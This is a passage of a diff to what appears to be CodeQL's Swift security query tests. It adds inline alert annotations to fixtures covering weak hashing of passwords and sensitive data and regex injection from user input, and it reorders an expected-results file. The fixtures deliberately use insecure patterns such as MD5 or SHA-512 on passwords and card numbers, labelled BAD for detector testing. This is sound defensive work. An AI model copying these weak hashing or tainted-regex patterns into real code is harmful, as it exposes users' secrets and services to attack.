Alert[swift/weak-sensitive-data-hashing] hash.update(bufferPointer: encrypted_passwd) // GOOD (not sensitive) - hash.update(bufferPointer: account_no) // BAD - hash.update(bufferPointer: credit_card_no) // BAD + hash.update(bufferPointer: account_no) // BAD // $ Alert[swift/weak-sensitive-data-hashing] + hash.update(bufferPointer: credit_card_no) // BAD // $ Alert[swift/weak-sensitive-data-hashing] } func testSHA256UpdateWithUnsafeRawBufferPointer(passwd : UnsafeRawBufferPointer, cert: UnsafeRawBufferPointer, encrypted_passwd : UnsafeRawBufferPointer, account_no : UnsafeRawBufferPointer, credit_card_no : UnsafeRawBufferPointer) { var hash = Crypto.SHA256() - hash.update(bufferPointer: passwd) // BAD, not a computationally expensive hash + hash.update(bufferPointer: passwd) // BAD, not a computationally expensive hash // $ Alert[swift/weak-password-hashing] hash.update(bufferPointer: cert) // GOOD hash.update(bufferPointer: encrypted_passwd) // GOOD (not sensitive) hash.update(bufferPointer: account_no) // GOOD @@ -198,7 +198,7 @@ func testSHA256UpdateWithUnsafeRawBufferPointer(passwd : UnsafeRawBufferPointer, func testSHA384UpdateWithUnsafeRawBufferPointer(passwd : UnsafeRawBufferPointer, cert: UnsafeRawBufferPointer, encrypted_passwd : UnsafeRawBufferPointer, account_no : UnsafeRawBufferPointer, credit_card_no : UnsafeRawBufferPointer) { var hash = Crypto.SHA384() - hash.update(bufferPointer: passwd) // BAD, not a computationally expensive hash + hash.update(bufferPointer: passwd) // BAD, not a computationally expensive hash // $ Alert[swift/weak-password-hashing] hash.update(bufferPointer: cert) // GOOD hash.update(bufferPointer: encrypted_passwd) // GOOD (not sensitive) hash.update(bufferPointer: account_no) // GOOD @@ -207,7 +207,7 @@ func testSHA384UpdateWithUnsafeRawBufferPointer(passwd : UnsafeRawBufferPointer, func testSHA512UpdateWithUnsafeRawBufferPointer(passwd : UnsafeRawBufferPointer, cert: UnsafeRawBufferPointer, encrypted_passwd : UnsafeRawBufferPointer, account_no : UnsafeRawBufferPointer, credit_card_no : UnsafeRawBufferPointer) { var hash = Crypto.SHA512() - hash.update(bufferPointer: passwd) // BAD, not a computationally expensive hash + hash.update(bufferPointer: passwd) // BAD, not a computationally expensive hash // $ Alert[swift/weak-password-hashing] hash.update(bufferPointer: cert) // GOOD hash.update(bufferPointer: encrypted_passwd) // GOOD (not sensitive) hash.update(bufferPointer: account_no) // GOOD @@ -217,30 +217,30 @@ func testSHA512UpdateWithUnsafeRawBufferPointer(passwd : UnsafeRawBufferPointer, func testBadExample(passwordString: String) { // this is the "bad" example from the .qhelp let passwordData = Data(passwordString.utf8) - let passwordHash = Crypto.SHA512.hash(data: passwordData) // BAD, not a computationally expensive hash + let passwordHash = Crypto.SHA512.hash(data: passwordData) // BAD, not a computationally expensive hash // $ Alert[swift/weak-password-hashing] // ... - if Crypto.SHA512.hash(data: Data(passwordString.utf8)) == passwordHash { // BAD, not a computationally expensive hash + if Crypto.SHA512.hash(data: Data(passwordString.utf8)) == passwordHash { // BAD, not a computationally expensive hash // $ Alert[swift/weak-password-hashing] // ... } } func testWithFlowAndMetatypes(cardNumber: String) { - let value1 = Data(cardNumber.utf8); - let _digest1 = Insecure.MD5.hash(data: value1); // BAD + let value1 = Data(cardNumber.utf8); // $ Source[swift/weak-sensitive-data-hashing] + let _digest1 = Insecure.MD5.hash(data: value1); // BAD // $ Alert[swift/weak-sensitive-data-hashing] - let value2 = Data(cardNumber.utf8); + let value2 = Data(cardNumber.utf8); // $ Source[swift/weak-sensitive-data-hashing] let hasher2 = Insecure.MD5.self; // metatype - let _digest2 = hasher2.hash(data: value2); // BAD + let _digest2 = hasher2.hash(data: value2); // BAD // $ Alert[swift/weak-sensitive-data-hashing] - let value3 = Data(cardNumber.utf8); - let _digest3 = (Insecure.MD5.self).hash(data: value3); // BAD + let value3 = Data(cardNumber.utf8); // $ Source[swift/weak-sensitive-data-hashing] + let _digest3 = (Insecure.MD5.self).hash(data: value3); // BAD // $ Alert[swift/weak-sensitive-data-hashing] - let value4 = Data(cardNumber.utf8); + let value4 = Data(cardNumber.utf8); // $ Source[swift/weak-sensitive-data-hashing] testReceiver1(value: value4); - let value5 = Data(cardNumber.utf8); + let value5 = Data(cardNumber.utf8); // $ Source[swift/weak-sensitive-data-hashing] testReceiver2(hasher: Insecure.MD5.self, value: value5); let value6 = Data(cardNumber.utf8); @@ -248,11 +248,11 @@ func testWithFlowAndMetatypes(cardNumber: String) { } func testReceiver1(value: Data) { - let _digest = Insecure.MD5.hash(data: value); // BAD + let _digest = Insecure.MD5.hash(data: value); // BAD // $ Alert[swift/weak-sensitive-data-hashing] } func testReceiver2(hasher: Insecure.MD5.Type, value: Data) { - let _digest = hasher.hash(data: value); // BAD + let _digest = hasher.hash(data: value); // BAD // $ Alert[swift/weak-sensitive-data-hashing] } func testReceiver3(hasher: H.Type, value: Data) { diff --git a/swift/ql/test/query-tests/Security/CWE-328/testCryptoSwift.swift b/swift/ql/test/query-tests/Security/CWE-328/testCryptoSwift.swift index 15043bc15f68..661f64ba09a0 100644 --- a/swift/ql/test/query-tests/Security/CWE-328/testCryptoSwift.swift +++ b/swift/ql/test/query-tests/Security/CWE-328/testCryptoSwift.swift @@ -150,83 +150,83 @@ extension String { func testArrays(harmlessArray: Array, phoneNumberArray: Array, passwdArray: Array) { _ = MD5().calculate(for: harmlessArray) // GOOD (not sensitive) - _ = MD5().calculate(for: phoneNumberArray) // BAD - _ = MD5().calculate(for: passwdArray) // BAD + _ = MD5().calculate(for: phoneNumberArray) // BAD // $ Alert[swift/weak-sensitive-data-hashing] + _ = MD5().calculate(for: passwdArray) // BAD // $ Alert[swift/weak-password-hashing] _ = SHA1().calculate(for: harmlessArray) // GOOD (not sensitive) - _ = SHA1().calculate(for: phoneNumberArray) // BAD - _ = SHA1().calculate(for: passwdArray) // BAD + _ = SHA1().calculate(for: phoneNumberArray) // BAD // $ Alert[swift/weak-sensitive-data-hashing] + _ = SHA1().calculate(for: passwdArray) // BAD // $ Alert[swift/weak-password-hashing] _ = SHA2(variant: .sha512).calculate(for: harmlessArray) // GOOD _ = SHA2(variant: .sha512).calculate(for: phoneNumberArray) // GOOD - _ = SHA2(variant: .sha512).calculate(for: passwdArray) // BAD + _ = SHA2(variant: .sha512).calculate(for: passwdArray) // BAD // $ Alert[swift/weak-password-hashing] _ = SHA3(variant: .sha512).calculate(for: harmlessArray) // GOOD _ = SHA3(variant: .sha512).calculate(for: phoneNumberArray) // GOOD - _ = SHA3(variant: .sha512).calculate(for: passwdArray) // BAD + _ = SHA3(variant: .sha512).calculate(for: passwdArray) // BAD // $ Alert[swift/weak-password-hashing] _ = Digest.md5(harmlessArray) // GOOD (not sensitive) - _ = Digest.md5(phoneNumberArray) // BAD - _ = Digest.md5(passwdArray) // BAD + _ = Digest.md5(phoneNumberArray) // BAD // $ Alert[swift/weak-sensitive-data-hashing] + _ = Digest.md5(passwdArray) // BAD // $ Alert[swift/weak-password-hashing] _ = Digest.sha1(harmlessArray) // GOOD (not sensitive) - _ = Digest.sha1(phoneNumberArray) // BAD - _ = Digest.sha1(passwdArray) // BAD + _ = Digest.sha1(phoneNumberArray) // BAD // $ Alert[swift/weak-sensitive-data-hashing] + _ = Digest.sha1(passwdArray) // BAD // $ Alert[swift/weak-password-hashing] _ = Digest.sha512(harmlessArray) // GOOD (not sensitive) _ = Digest.sha512(phoneNumberArray) // GOOD - _ = Digest.sha512(passwdArray) // BAD + _ = Digest.sha512(passwdArray) // BAD // $ Alert[swift/weak-password-hashing] _ = Digest.sha2(harmlessArray, variant: .sha512) // GOOD (not sensitive) _ = Digest.sha2(phoneNumberArray, variant: .sha512) // GOOD - _ = Digest.sha2(passwdArray, variant: .sha512) // BAD + _ = Digest.sha2(passwdArray, variant: .sha512) // BAD // $ Alert[swift/weak-password-hashing] _ = Digest.sha3(harmlessArray, variant: .sha512) // GOOD (not sensitive) _ = Digest.sha3(phoneNumberArray, variant: .sha512) // GOOD - _ = Digest.sha3(passwdArray, variant: .sha512) // BAD + _ = Digest.sha3(passwdArray, variant: .sha512) // BAD // $ Alert[swift/weak-password-hashing] _ = harmlessArray.md5() // GOOD (not sensitive) - _ = phoneNumberArray.md5() // BAD - _ = passwdArray.md5() // BAD + _ = phoneNumberArray.md5() // BAD // $ Alert[swift/weak-sensitive-data-hashing] + _ = passwdArray.md5() // BAD // $ Alert[swift/weak-password-hashing] _ = harmlessArray.sha1() // GOOD (not sensitive) - _ = phoneNumberArray.sha1() // BAD - _ = passwdArray.sha1() // BAD + _ = phoneNumberArray.sha1() // BAD // $ Alert[swift/weak-sensitive-data-hashing] + _ = passwdArray.sha1() // BAD // $ Alert[swift/weak-password-hashing] _ = harmlessArray.sha512() // GOOD _ = phoneNumberArray.sha512() // GOOD - _ = passwdArray.sha512() // BAD + _ = passwdArray.sha512() // BAD // $ Alert[swift/weak-password-hashing] _ = harmlessArray.sha2(.sha512) // GOOD _ = phoneNumberArray.sha2(.sha512) // GOOD - _ = passwdArray.sha2(.sha512) // BAD + _ = passwdArray.sha2(.sha512) // BAD // $ Alert[swift/weak-password-hashing] _ = harmlessArray.sha3(.sha512) // GOOD _ = phoneNumberArray.sha3(.sha512) // GOOD - _ = passwdArray.sha3(.sha512) // BAD + _ = passwdArray.sha3(.sha512) // BAD // $ Alert[swift/weak-password-hashing] } func testData(harmlessData: Data, medicalData: Data, passwdData: Data) { _ = harmlessData.md5() // GOOD (not sensitive) - _ = medicalData.md5() // BAD - _ = passwdData.md5() // BAD + _ = medicalData.md5() // BAD // $ Alert[swift/weak-sensitive-data-hashing] + _ = passwdData.md5() // BAD // $ Alert[swift/weak-password-hashing] _ = harmlessData.sha1() // GOOD (not sensitive) - _ = medicalData.sha1() // BAD - _ = passwdData.sha1() // BAD + _ = medicalData.sha1() // BAD // $ Alert[swift/weak-sensitive-data-hashing] + _ = passwdData.sha1() // BAD // $ Alert[swift/weak-password-hashing] _ = harmlessData.sha512() // GOOD _ = medicalData.sha512() // GOOD - _ = passwdData.sha512() // BAD + _ = passwdData.sha512() // BAD // $ Alert[swift/weak-password-hashing] _ = harmlessData.sha2(.sha512) // GOOD _ = medicalData.sha2(.sha512) // GOOD - _ = passwdData.sha2(.sha512) // BAD + _ = passwdData.sha2(.sha512) // BAD // $ Alert[swift/weak-password-hashing] _ = harmlessData.sha3(.sha512) // GOOD _ = medicalData.sha3(.sha512) // GOOD - _ = passwdData.sha3(.sha512) // BAD + _ = passwdData.sha3(.sha512) // BAD // $ Alert[swift/weak-password-hashing] } func testStrings(creditCardNumber: String, passwd: String) { _ = "harmless".md5() // GOOD (not sensitive) - _ = creditCardNumber.md5() // BAD - _ = passwd.md5() // BAD + _ = creditCardNumber.md5() // BAD // $ Alert[swift/weak-sensitive-data-hashing] + _ = passwd.md5() // BAD // $ Alert[swift/weak-password-hashing] _ = "harmless".sha1() // GOOD (not sensitive) - _ = creditCardNumber.sha1() // BAD - _ = passwd.sha1() // BAD + _ = creditCardNumber.sha1() // BAD // $ Alert[swift/weak-sensitive-data-hashing] + _ = passwd.sha1() // BAD // $ Alert[swift/weak-password-hashing] _ = "harmless".sha512() // GOOD _ = creditCardNumber.sha512() // GOOD - _ = passwd.sha512() // BAD + _ = passwd.sha512() // BAD // $ Alert[swift/weak-password-hashing] _ = "harmless".sha2(.sha512) // GOOD _ = creditCardNumber.sha2(.sha512) // GOOD - _ = passwd.sha2(.sha512) // BAD + _ = passwd.sha2(.sha512) // BAD // $ Alert[swift/weak-password-hashing] _ = "harmless".sha3(.sha512) // GOOD _ = creditCardNumber.sha3(.sha512) // GOOD - _ = passwd.sha3(.sha512) // BAD + _ = passwd.sha3(.sha512) // BAD // $ Alert[swift/weak-password-hashing] } diff --git a/swift/ql/test/query-tests/Security/CWE-730/RegexInjection.expected b/swift/ql/test/query-tests/Security/CWE-730/RegexInjection.expected index 1a26f9211971..04dafbd0b5e9 100644 --- a/swift/ql/test/query-tests/Security/CWE-730/RegexInjection.expected +++ b/swift/ql/test/query-tests/Security/CWE-730/RegexInjection.expected @@ -1,3 +1,27 @@ +#select +| tests.swift:101:16:101:16 | taintedString | tests.swift:95:22:95:46 | call to String.init(contentsOf:) | tests.swift:101:16:101:16 | taintedString | This regular expression is constructed from a $@. | tests.swift:95:22:95:46 | call to String.init(contentsOf:) | user-provided value | +| tests.swift:104:16:104:40 | ... .+(_:_:) ... | tests.swift:95:22:95:46 | call to String.init(contentsOf:) | tests.swift:104:16:104:40 | ... .+(_:_:) ... | This regular expression is constructed from a $@. | tests.swift:95:22:95:46 | call to String.init(contentsOf:) | user-provided value | +| tests.swift:106:16:106:16 | "..." | tests.swift:95:22:95:46 | call to String.init(contentsOf:) | tests.swift:106:16:106:16 | "..." | This regular expression is constructed from a $@. | tests.swift:95:22:95:46 | call to String.init(contentsOf:) | user-provided value | +| tests.swift:109:16:109:39 | ... ? ... : ... | tests.swift:95:22:95:46 | call to String.init(contentsOf:) | tests.swift:109:16:109:39 | ... ? ... : ... | This regular expression is constructed from a $@. | tests.swift:95:22:95:46 | call to String.init(contentsOf:) | user-provided value | +| tests.swift:110:16:110:37 | ... ? ... : ... | tests.swift:95:22:95:46 | call to String.init(contentsOf:) | tests.swift:110:16:110:37 | ... ? ... : ... | This regular expression is constructed from a $@. | tests.swift:95:22:95:46 | call to String.init(contentsOf:) | user-provided value | +| tests.swift:113:24:113:24 | taintedString | tests.swift:95:22:95:46 | call to String.init(contentsOf:) | tests.swift:113:24:113:24 | taintedString | This regular expression is constructed from a $@. | tests.swift:95:22:95:46 | call to String.init(contentsOf:) | user-provided value | +| tests.swift:114:45:114:45 | taintedString | tests.swift:95:22:95:46 | call to String.init(contentsOf:) | tests.swift:114:45:114:45 | taintedString | This regular expression is constructed from a $@. | tests.swift:95:22:95:46 | call to String.init(contentsOf:) | user-provided value | +| tests.swift:120:19:120:19 | taintedString | tests.swift:95:22:95:46 | call to String.init(contentsOf:) | tests.swift:120:19:120:19 | taintedString | This regular expression is constructed from a $@. | tests.swift:95:22:95:46 | call to String.init(contentsOf:) | user-provided value | +| tests.swift:126:40:126:40 | taintedString | tests.swift:95:22:95:46 | call to String.init(contentsOf:) | tests.swift:126:40:126:40 | taintedString | This regular expression is constructed from a $@. | tests.swift:95:22:95:46 | call to String.init(contentsOf:) | user-provided value | +| tests.swift:131:39:131:39 | taintedString | tests.swift:95:22:95:46 | call to String.init(contentsOf:) | tests.swift:131:39:131:39 | taintedString | This regular expression is constructed from a $@. | tests.swift:95:22:95:46 | call to String.init(contentsOf:) | user-provided value | +| tests.swift:137:40:137:40 | taintedString | tests.swift:95:22:95:46 | call to String.init(contentsOf:) | tests.swift:137:40:137:40 | taintedString | This regular expression is constructed from a $@. | tests.swift:95:22:95:46 | call to String.init(contentsOf:) | user-provided value | +| tests.swift:144:16:144:16 | remoteInput | tests.swift:95:22:95:46 | call to String.init(contentsOf:) | tests.swift:144:16:144:16 | remoteInput | This regular expression is constructed from a $@. | tests.swift:95:22:95:46 | call to String.init(contentsOf:) | user-provided value | +| tests.swift:147:39:147:39 | regexStr | tests.swift:95:22:95:46 | call to String.init(contentsOf:) | tests.swift:147:39:147:39 | regexStr | This regular expression is constructed from a $@. | tests.swift:95:22:95:46 | call to String.init(contentsOf:) | user-provided value | +| tests.swift:162:17:162:17 | taintedString | tests.swift:95:22:95:46 | call to String.init(contentsOf:) | tests.swift:162:17:162:17 | taintedString | This regular expression is constructed from a $@. | tests.swift:95:22:95:46 | call to String.init(contentsOf:) | user-provided value | +| tests.swift:164:17:164:17 | taintedString | tests.swift:95:22:95:46 | call to String.init(contentsOf:) | tests.swift:164:17:164:17 | taintedString | This regular expression is constructed from a $@. | tests.swift:95:22:95:46 | call to String.init(contentsOf:) | user-provided value | +| tests.swift:167:17:167:17 | taintedString | tests.swift:95:22:95:46 | call to String.init(contentsOf:) | tests.swift:167:17:167:17 | taintedString | This regular expression is constructed from a $@. | tests.swift:95:22:95:46 | call to String.init(contentsOf:) | user-provided value | +| tests.swift:170:17:170:17 | taintedString | tests.swift:95:22:95:46 | call to String.init(contentsOf:) | tests.swift:170:17:170:17 | taintedString | This regular expression is constructed from a $@. | tests.swift:95:22:95:46 | call to String.init(contentsOf:) | user-provided value | +| tests.swift:173:17:173:17 | taintedString | tests.swift:95:22:95:46 | call to String.init(contentsOf:) | tests.swift:173:17:173:17 | taintedString | This regular expression is constructed from a $@. | tests.swift:95:22:95:46 | call to String.init(contentsOf:) | user-provided value | +| tests.swift:176:17:176:17 | taintedString | tests.swift:95:22:95:46 | call to String.init(contentsOf:) | tests.swift:176:17:176:17 | taintedString | This regular expression is constructed from a $@. | tests.swift:95:22:95:46 | call to String.init(contentsOf:) | user-provided value | +| tests.swift:179:17:179:17 | taintedString | tests.swift:95:22:95:46 | call to String.init(contentsOf:) | tests.swift:179:17:179:17 | taintedString | This regular expression is constructed from a $@. | tests.swift:95:22:95:46 | call to String.init(contentsOf:) | user-provided value | +| tests.swift:182:17:182:17 | taintedString | tests.swift:95:22:95:46 | call to String.init(contentsOf:) | tests.swift:182:17:182:17 | taintedString | This regular expression is constructed from a $@. | tests.swift:95:22:95:46 | call to String.init(contentsOf:) | user-provided value | +| tests.swift:185:17:185:17 | taintedString | tests.swift:95:22:95:46 | call to String.init(contentsOf:) | tests.swift:185:17:185:17 | taintedString | This regular expression is constructed from a $@. | tests.swift:95:22:95:46 | call to String.init(contentsOf:) | user-provided value | +| tests.swift:190:21:190:21 | taintedString | tests.swift:95:22:95:46 | call to String.init(contentsOf:) | tests.swift:190:21:190:21 | taintedString | This regular expression is constructed from a $@. | tests.swift:95:22:95:46 | call to String.init(contentsOf:) | user-provided value | edges | tests.swift:95:22:95:46 | call to String.init(contentsOf:) | tests.swift:101:16:101:16 | taintedString | provenance | | | tests.swift:95:22:95:46 | call to String.init(contentsOf:) | tests.swift:104:16:104:40 | ... .+(_:_:) ... | provenance | | @@ -48,27 +72,3 @@ nodes | tests.swift:185:17:185:17 | taintedString | semmle.label | taintedString | | tests.swift:190:21:190:21 | taintedString | semmle.label | taintedString | subpaths -#select -| tests.swift:101:16:101:16 | taintedString | tests.swift:95:22:95:46 | call to String.init(contentsOf:) | tests.swift:101:16:101:16 | taintedString | This regular expression is constructed from a $@. | tests.swift:95:22:95:46 | call to String.init(contentsOf:) | user-provided value | -| tests.swift:104:16:104:40 | ... .+(_:_:) ... | tests.swift:95:22:95:46 | call to String.init(contentsOf:) | tests.swift:104:16:104:40 | ... .+(_:_:) ... | This regular expression is constructed from a $@. | tests.swift:95:22:95:46 | call to String.init(contentsOf:) | user-provided value | -| tests.swift:106:16:106:16 | "..." | tests.swift:95:22:95:46 | call to String.init(contentsOf:) | tests.swift:106:16:106:16 | "..." | This regular expression is constructed from a $@. | tests.swift:95:22:95:46 | call to String.init(contentsOf:) | user-provided value | -| tests.swift:109:16:109:39 | ... ? ... : ... | tests.swift:95:22:95:46 | call to String.init(contentsOf:) | tests.swift:109:16:109:39 | ... ? ... : ... | This regular expression is constructed from a $@. | tests.swift:95:22:95:46 | call to String.init(contentsOf:) | user-provided value | -| tests.swift:110:16:110:37 | ... ? ... : ... | tests.swift:95:22:95:46 | call to String.init(contentsOf:) | tests.swift:110:16:110:37 | ... ? ... : ... | This regular expression is constructed from a $@. | tests.swift:95:22:95:46 | call to String.init(contentsOf:) | user-provided value | -| tests.swift:113:24:113:24 | taintedString | tests.swift:95:22:95:46 | call to String.init(contentsOf:) | tests.swift:113:24:113:24 | taintedString | This regular expression is constructed from a $@. | tests.swift:95:22:95:46 | call to String.init(contentsOf:) | user-provided value | -| tests.swift:114:45:114:45 | taintedString | tests.swift:95:22:95:46 | call to String.init(contentsOf:) | tests.swift:114:45:114:45 | taintedString | This regular expression is constructed from a $@. | tests.swift:95:22:95:46 | call to String.init(contentsOf:) | user-provided value | -| tests.swift:120:19:120:19 | taintedString | tests.swift:95:22:95:46 | call to String.init(contentsOf:) | tests.swift:120:19:120:19 | taintedString | This regular expression is constructed from a $@. | tests.swift:95:22:95:46 | call to String.init(contentsOf:) | user-provided value | -| tests.swift:126:40:126:40 | taintedString | tests.swift:95:22:95:46 | call to String.init(contentsOf:) | tests.swift:126:40:126:40 | taintedString | This regular expression is constructed from a $@. | tests.swift:95:22:95:46 | call to String.init(contentsOf:) | user-provided value | -| tests.swift:131:39:131:39 | taintedString | tests.swift:95:22:95:46 | call to String.init(contentsOf:) | tests.swift:131:39:131:39 | taintedString | This regular expression is constructed from a $@. | tests.swift:95:22:95:46 | call to String.init(contentsOf:) | user-provided value | -| tests.swift:137:40:137:40 | taintedString | tests.swift:95:22:95:46 | call to String.init(contentsOf:) | tests.swift:137:40:137:40 | taintedString | This regular expression is constructed from a $@. | tests.swift:95:22:95:46 | call to String.init(contentsOf:) | user-provided value | -| tests.swift:144:16:144:16 | remoteInput | tests.swift:95:22:95:46 | call to String.init(contentsOf:) | tests.swift:144:16:144:16 | remoteInput | This regular expression is constructed from a $@. | tests.swift:95:22:95:46 | call to String.init(contentsOf:) | user-provided value | -| tests.swift:147:39:147:39 | regexStr | tests.swift:95:22:95:46 | call to String.init(contentsOf:) | tests.swift:147:39:147:39 | regexStr | This regular expression is constructed from a $@. | tests.swift:95:22:95:46 | call to String.init(contentsOf:) | user-provided value | -| tests.swift:162:17:162:17 | taintedString | tests.swift:95:22:95:46 | call to String.init(contentsOf:) | tests.swift:162:17:162:17 | taintedString | This regular expression is constructed from a $@. | tests.swift:95:22:95:46 | call to String.init(contentsOf:) | user-provided value | -| tests.swift:164:17:164:17 | taintedString | tests.swift:95:22:95:46 | call to String.init(contentsOf:) | tests.swift:164:17:164:17 | taintedString | This regular expression is constructed from a $@. | tests.swift:95:22:95:46 | call to String.init(contentsOf:) | user-provided value | -| tests.swift:167:17:167:17 | taintedString | tests.swift:95:22:95:46 | call to String.init(contentsOf:) | tests.swift:167:17:167:17 | taintedString | This regular expression is constructed from a $@. | tests.swift:95:22:95:46 | call to String.init(contentsOf:) | user-provided value | -| tests.swift:170:17:170:17 | taintedString | tests.swift:95:22:95:46 | call to String.init(contentsOf:) | tests.swift:170:17:170:17 | taintedString | This regular expression is constructed from a $@. | tests.swift:95:22:95:46 | call to String.init(contentsOf:) | user-provided value | -| tests.swift:173:17:173:17 | taintedString | tests.swift:95:22:95:46 | call to String.init(contentsOf:) | tests.swift:173:17:173:17 | taintedString | This regular expression is constructed from a $@. | tests.swift:95:22:95:46 | call to String.init(contentsOf:) | user-provided value | -| tests.swift:176:17:176:17 | taintedString | tests.swift:95:22:95:46 | call to String.init(contentsOf:) | tests.swift:176:17:176:17 | taintedString | This regular expression is constructed from a $@. | tests.swift:95:22:95:46 | call to String.init(contentsOf:) | user-provided value | -| tests.swift:179:17:179:17 | taintedString | tests.swift:95:22:95:46 | call to String.init(contentsOf:) | tests.swift:179:17:179:17 | taintedString | This regular expression is constructed from a $@. | tests.swift:95:22:95:46 | call to String.init(contentsOf:) | user-provided value | -| tests.swift:182:17:182:17 | taintedString | tests.swift:95:22:95:46 | call to String.init(contentsOf:) | tests.swift:182:17:182:17 | taintedString | This regular expression is constructed from a $@. | tests.swift:95:22:95:46 | call to String.init(contentsOf:) | user-provided value | -| tests.swift:185:17:185:17 | taintedString | tests.swift:95:22:95:46 | call to String.init(contentsOf:) | tests.swift:185:17:185:17 | taintedString | This regular expression is constructed from a $@. | tests.swift:95:22:95:46 | call to String.init(contentsOf:) | user-provided value | -| tests.swift:190:21:190:21 | taintedString | tests.swift:95:22:95:46 | call to String.init(contentsOf:) | tests.swift:190:21:190:21 | taintedString | This regular expression is constructed from a $@. | tests.swift:95:22:95:46 | call to String.init(contentsOf:) | user-provided value | diff --git a/swift/ql/test/query-tests/Security/CWE-730/RegexInjection.qlref b/swift/ql/test/query-tests/Security/CWE-730/RegexInjection.qlref index 6171cd820742..edd571a6692b 100644 --- a/swift/ql/test/query-tests/Security/CWE-730/RegexInjection.qlref +++ b/swift/ql/test/query-tests/Security/CWE-730/RegexInjection.qlref @@ -1 +1,2 @@ -queries/Security/CWE-730/RegexInjection.ql +query: queries/Security/CWE-730/RegexInjection.ql +postprocess: utils/test/InlineExpectationsTestQuery.ql diff --git a/swift/ql/test/query-tests/Security/CWE-730/tests.swift b/swift/ql/test/query-tests/Security/CWE-730/tests.swift index 234821d46aca..cd9b7adba464 100644 --- a/swift/ql/test/query-tests/Security/CWE-730/tests.swift +++ b/swift/ql/test/query-tests/Security/CWE-730/tests.swift @@ -92,59 +92,59 @@ extension String { func regexInjectionTests(cond: Bool, varString: String, myUrl: URL) throws { let constString = ".*" - let taintedString = String(contentsOf: myUrl) // tainted + let taintedString = String(contentsOf: myUrl) // tainted // $ Source // --- Regex --- _ = try Regex(constString).firstMatch(in: varString) _ = try Regex(varString).firstMatch(in: varString) - _ = try Regex(taintedString).firstMatch(in: varString) // BAD + _ = try Regex(taintedString).firstMatch(in: varString) // BAD // $ Alert _ = try Regex("(a|" + constString + ")").firstMatch(in: varString) - _ = try Regex("(a|" + taintedString + ")").firstMatch(in: varString) // BAD + _ = try Regex("(a|" + taintedString + ")").firstMatch(in: varString) // BAD // $ Alert _ = try Regex("(a|\(constString))").firstMatch(in: varString) - _ = try Regex("(a|\(taintedString))").firstMatch(in: varString) // BAD + _ = try Regex("(a|\(taintedString))").firstMatch(in: varString) // BAD // $ Alert _ = try Regex(cond ? constString : constString).firstMatch(in: varString) - _ = try Regex(cond ? taintedString : constString).firstMatch(in: varString) // BAD - _ = try Regex(cond ? constString : taintedString).firstMatch(in: varString) // BAD + _ = try Regex(cond ? taintedString : constString).firstMatch(in: varString) // BAD // $ Alert + _ = try Regex(cond ? constString : taintedString).firstMatch(in: varString) // BAD // $ Alert _ = try (cond ? Regex(constString) : Regex(constString)).firstMatch(in: varString) - _ = try (cond ? Regex(taintedString) : Regex(constString)).firstMatch(in: varString) // BAD - _ = try (cond ? Regex(constString) : Regex(taintedString)).firstMatch(in: varString) // BAD + _ = try (cond ? Regex(taintedString) : Regex(constString)).firstMatch(in: varString) // BAD // $ Alert + _ = try (cond ? Regex(constString) : Regex(taintedString)).firstMatch(in: varString) // BAD // $ Alert // --- RangeReplaceableCollection --- var inputVar = varString inputVar.replace(constString, with: "") - inputVar.replace(taintedString, with: "") // BAD + inputVar.replace(taintedString, with: "") // BAD // $ Alert inputVar.replace(constString, with: taintedString) // --- StringProtocol --- _ = inputVar.replacingOccurrences(of: constString, with: "", options: .regularExpression) - _ = inputVar.replacingOccurrences(of: taintedString, with: "", options: .regularExpression) // BAD + _ = inputVar.replacingOccurrences(of: taintedString, with: "", options: .regularExpression) // BAD // $ Alert // --- NSRegularExpression --- _ = try NSRegularExpression(pattern: constString).firstMatch(in: varString, range: NSMakeRange(0, varString.utf16.count)) - _ = try NSRegularExpression(pattern: taintedString).firstMatch(in: varString, range: NSMakeRange(0, varString.utf16.count)) // BAD + _ = try NSRegularExpression(pattern: taintedString).firstMatch(in: varString, range: NSMakeRange(0, varString.utf16.count)) // BAD // $ Alert // --- NSString --- let nsString = NSString(string: varString) _ = nsString.replacingOccurrences(of: constString, with: "", options: .regularExpression, range: NSMakeRange(0, nsString.length)) - _ = nsString.replacingOccurrences(of: taintedString, with: "", options: .regularExpression, range: NSMakeRange(0, nsString.length)) // BAD + _ = nsString.replacingOccurrences(of: taintedString, with: "", options: .regularExpression, range: NSMakeRange(0, nsString.length)) // BAD // $ Alert // --- from the qhelp --- let remoteInput = taintedString let myRegex = ".*" - _ = try Regex(remoteInput) // BAD + _ = try Regex(remoteInput) // BAD // $ Alert let regexStr = "abc|\(remoteInput)" - _ = try NSRegularExpression(pattern: regexStr) // BAD + _ = try NSRegularExpression(pattern: regexStr) // BAD // $ Alert _ = try Regex(myRegex) @@ -159,35 +159,35 @@ func regexInjectionTests(cond: Bool, varString: String, myUrl: URL) throws { let okSet: Set = ["abc", "def"] if (taintedString == okInput) { - _ = try Regex(taintedString).firstMatch(in: varString) // GOOD (effectively sanitized by the check) [FALSE POSITIVE] + _ = try Regex(taintedString).firstMatch(in: varString) // GOOD (effectively sanitized by the check) [FALSE POSITIVE] // $ Alert } else { - _ = try Regex(taintedString).firstMatch(in: varString) // BAD + _ = try Regex(taintedString).firstMatch(in: varString) // BAD // $ Alert } if (taintedString != okInput) { - _ = try Regex(taintedString).firstMatch(in: varString) // BAD + _ = try Regex(taintedString).firstMatch(in: varString) // BAD // $ Alert } if (varString == okInput) { - _ = try Regex(taintedString).firstMatch(in: varString) // BAD + _ = try Regex(taintedString).firstMatch(in: varString) // BAD // $ Alert } if (okInputs.contains(taintedString)) { - _ = try Regex(taintedString).firstMatch(in: varString) // GOOD (effectively sanitized by the check) [FALSE POSITIVE] + _ = try Regex(taintedString).firstMatch(in: varString) // GOOD (effectively sanitized by the check) [FALSE POSITIVE] // $ Alert } if (okInputs.firstIndex(of: taintedString) != nil) { - _ = try Regex(taintedString).firstMatch(in: varString) // GOOD (effectively sanitized by the check) [FALSE POSITIVE] + _ = try Regex(taintedString).firstMatch(in: varString) // GOOD (effectively sanitized by the check) [FALSE POSITIVE] // $ Alert } if let index = okInputs.firstIndex(of: taintedString) { - _ = try Regex(taintedString).firstMatch(in: varString) // GOOD (effectively sanitized by the check) [FALSE POSITIVE] + _ = try Regex(taintedString).firstMatch(in: varString) // GOOD (effectively sanitized by the check) [FALSE POSITIVE] // $ Alert } if let index = okInputs.index(of: taintedString) { - _ = try Regex(taintedString).firstMatch(in: varString) // GOOD (effectively sanitized by the check) [FALSE POSITIVE] + _ = try Regex(taintedString).firstMatch(in: varString) // GOOD (effectively sanitized by the check) [FALSE POSITIVE] // $ Alert } if (okSet.contains(taintedString)) { - _ = try Regex(taintedString).firstMatch(in: varString) // GOOD (effectively 